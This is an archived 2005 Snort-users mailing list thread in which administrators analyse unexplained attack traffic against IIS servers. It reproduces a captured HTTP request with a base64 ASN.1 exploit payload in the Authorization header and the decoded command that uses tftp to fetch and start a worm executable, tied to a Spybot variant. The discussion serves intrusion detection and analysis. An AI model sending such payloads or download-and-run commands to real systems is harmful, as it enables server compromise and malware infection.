Snort mailing list archives
Re: Unrecognized attack patterns against IIS
From: TPanaitescu () colorcon com
Date: Sat, 11 Jun 2005 12:53:15 -0400
That's it, "cmd /c tftp -i 0.0.0.0 GET msupdtm.exe&start msupdtm.exe&exit" among other things! Good point ! Thanks Tudor stephane nasdrovisky <stephane.nasdrovisky () paradigmo com> 06/11/2005 12:24 PM To TPanaitescu () colorcon com cc Michael Scheidell <scheidell () secnap net> Subject Re: [Snort-users] Unrecognized attack patterns against IIS Have you tried to base 64 decode this string ( http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx )? Don't forget the trailing ==. It looks like http://www.sarc.com/avcenter/venc/data/w32.spybot.pkc.html The decoded string contains: cmd /c tftp -i 0.0.0.0 GET msupdtm.exe The worm filename is different in my network neibourhood: cgy32win.exe, ms-upd.exe & win-logon.exe (98k -111k) TPanaitescu () colorcon com wrote:
Seen that too, it seems that it is a newer "patch" from MS for IE, or IEs configured for this, trying to negotiate authorization using SPNEGO from the GSS-API. You can see the packets in full if you use a sniffer in front of that web server, I used ethereal and got the info below. Could be an attack also trying to get unauthorized access to a server. Anyone with another clue ?
ASN.1 attack.
GET / HTTP/1.0 Host: X.X.X.X Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK
2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDAuMC4wLjAgR0VUIG1zdXBkdG0uZXhlJnN0YXJ0IG1zdXBkdG0uZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
Current thread:
- Unrecognized attack patterns against IIS Michael Scheidell (Jun 11)
- Re: Unrecognized attack patterns against IIS TPanaitescu (Jun 11)
- <Possible follow-ups>
- FW: Unrecognized attack patterns against IIS Michael Scheidell (Jun 11)
- Re: Unrecognized attack patterns against IIS TPanaitescu (Jun 11)